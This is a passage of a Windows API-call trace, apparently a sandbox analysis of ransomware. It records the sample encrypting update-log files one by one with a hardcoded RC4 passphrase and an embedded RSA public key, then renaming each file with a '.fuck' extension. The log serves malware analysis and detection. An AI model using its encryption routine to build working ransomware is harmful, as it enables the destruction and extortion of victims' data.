pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.168] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f31e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f31e0*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.169] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.169] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.169] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.169] CloseHandle (hObject=0xffffffff) returned 1 [0241.169] CloseHandle (hObject=0x5d10) returned 1 [0241.171] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl"), bFailIfExists=0) returned 0 [0241.179] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl", dwFileAttributes=0x2000) returned 0 [0241.180] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl.gsg")) returned 1 [0241.181] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl.fuck")) returned 0 [0241.182] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.182] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.182] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.182] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.182] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.182] GetLastError () returned 0x5 [0241.182] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl")) returned 0x2020 [0241.182] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl", dwFileAttributes=0x80) returned 0 [0241.182] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.183] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.183] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.184] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.186] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.186] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.186] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.186] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.187] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.187] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.187] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3400) returned 1 [0241.187] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3400, dwCertEncodingType=0x1, pInfo=0x29078a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29078d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29078e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7c38) returned 1 [0241.187] CryptEncrypt (in: hKey=0x28e7c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.187] CryptEncrypt (in: hKey=0x28e7c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3598*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3598*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.188] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3598*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3598*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.189] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.189] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.189] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.189] CloseHandle (hObject=0xffffffff) returned 1 [0241.189] CloseHandle (hObject=0x5d10) returned 1 [0241.191] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl"), bFailIfExists=0) returned 0 [0241.199] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl", dwFileAttributes=0x2000) returned 0 [0241.200] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl.gsg")) returned 1 [0241.201] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl.fuck")) returned 0 [0241.202] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.202] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.202] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.202] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.202] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.202] GetLastError () returned 0x5 [0241.202] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl")) returned 0x2020 [0241.202] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl", dwFileAttributes=0x80) returned 0 [0241.203] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.203] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.204] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.204] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.207] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.207] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.207] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.207] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.207] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.207] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.207] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3488) returned 1 [0241.208] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3488, dwCertEncodingType=0x1, pInfo=0x2907638*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907668*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907670*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7e78) returned 1 [0241.208] CryptEncrypt (in: hKey=0x28e7e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.208] CryptEncrypt (in: hKey=0x28e7e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3ae8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3ae8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.208] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3ae8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3ae8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.209] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.209] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.217] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.217] CloseHandle (hObject=0xffffffff) returned 1 [0241.217] CloseHandle (hObject=0x5d10) returned 1 [0241.218] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl"), bFailIfExists=0) returned 0 [0241.232] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl", dwFileAttributes=0x2000) returned 0 [0241.232] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl.gsg")) returned 1 [0241.234] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.007.etl.fuck")) returned 0 [0241.235] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.235] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.235] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.235] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.235] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.235] GetLastError () returned 0x5 [0241.235] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl")) returned 0x2020 [0241.235] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl", dwFileAttributes=0x80) returned 0 [0241.236] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.236] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.237] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.239] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.242] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.242] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.242] CryptHashData (hHash=0x28e8578, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.242] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.242] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.242] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.242] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3620) returned 1 [0241.243] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3620, dwCertEncodingType=0x1, pInfo=0x29072f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907328*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907330*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7af8) returned 1 [0241.243] CryptEncrypt (in: hKey=0x28e7af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.243] CryptEncrypt (in: hKey=0x28e7af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3730*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3730*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.243] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3730*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.244] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.244] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.244] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.244] CloseHandle (hObject=0xffffffff) returned 1 [0241.245] CloseHandle (hObject=0x5d10) returned 1 [0241.247] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl"), bFailIfExists=0) returned 0 [0241.254] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl", dwFileAttributes=0x2000) returned 0 [0241.254] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl.gsg")) returned 1 [0241.255] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.008.etl.fuck")) returned 0 [0241.256] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.256] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.256] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.256] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.256] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.256] GetLastError () returned 0x5 [0241.256] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl")) returned 0x2020 [0241.256] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl", dwFileAttributes=0x80) returned 0 [0241.257] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.257] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.257] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.258] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.260] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.260] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.260] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.260] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.260] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.260] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.260] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, 